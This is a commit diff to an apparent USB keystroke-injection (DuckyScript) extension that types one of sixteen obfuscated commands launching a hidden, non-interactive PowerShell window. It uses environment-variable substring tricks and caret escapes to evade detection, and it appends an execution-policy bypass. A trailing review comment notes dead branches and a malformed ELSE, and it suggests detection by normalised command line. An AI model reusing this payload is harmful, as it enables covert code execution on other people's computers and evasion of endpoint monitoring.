Update Rolling_Powershell_Execution

Updated formatting so extension can be properly collapsed
pull/227/head
0iphor13 2023-02-24 12:13:00 +01:00 committed by GitHub
parent 7c809ca7c0
commit 939e63bb11
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 58 additions and 60 deletions


@ -11,70 +11,68 @@ EXTENSION Rolling_Powershell_Execution
DEFINE #EXECUTIONPOLICY FALSE DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 200 DEFINE #DELAY 200
$_RANDOM_MIN = 1 $_RANDOM_MIN = 1
$_RANDOM_MAX = 16 $_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution() FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H STRING powershell.exe -noP -nOnI -windo H
END_IF END_IF
IF_DEFINED #EXECUTIONPOLICY IF_DEFINED #EXECUTIONPOLICY
SPACE SPACE
IF (($RANDOM_PS % 2) == 0) THEN IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs STRING -exEcUtion bYPaSs
ELSE ELSE
STRING -eP BYPaSs STRING -eP BYPaSs
END_IF END_IF
END_IF_DEFINED END_IF_DEFINED
ENTER ENTER
DELAY #DELAY DELAY #DELAY
END_FUNCTION END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000 REM DELAY 2000
REM GUI r REM GUI r
REM DELAY 2000 REM DELAY 2000
REM Rolling_Powershell_Execution() REM Rolling_Powershell_Execution()
END_EXTENSION END_EXTENSION
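Review bot: The variant list reads as sixteen launch strings and six policy strings, but the file has no comment saying which of them can actually be typed, and several cannot. The second `ELSE IF ($RANDOM_PS == 2) THEN` sits behind the first `== 2` test, so `powershell.exe -NoP -nOni -W h` is never reached. In the policy chain, every multiple of 10 or 12 is already taken by the `% 2` test, so `-exEcUtionPoL bYpaSs` and `-exEcUtion bYPaSs` are dead as well. The closing `ELSE ($RANDOM_PS == 16) THEN` also carries a condition on a plain `ELSE`, which may not parse as intended. Anyone deriving detection coverage from this file should know the variants differ only in case, parameter abbreviation and `%VAR:~n,1%` substitution, so a header line such as `REM All variants launch powershell.exe with no profile, non-interactive, hidden window; match on the normalised process command line, not these literals` would document that.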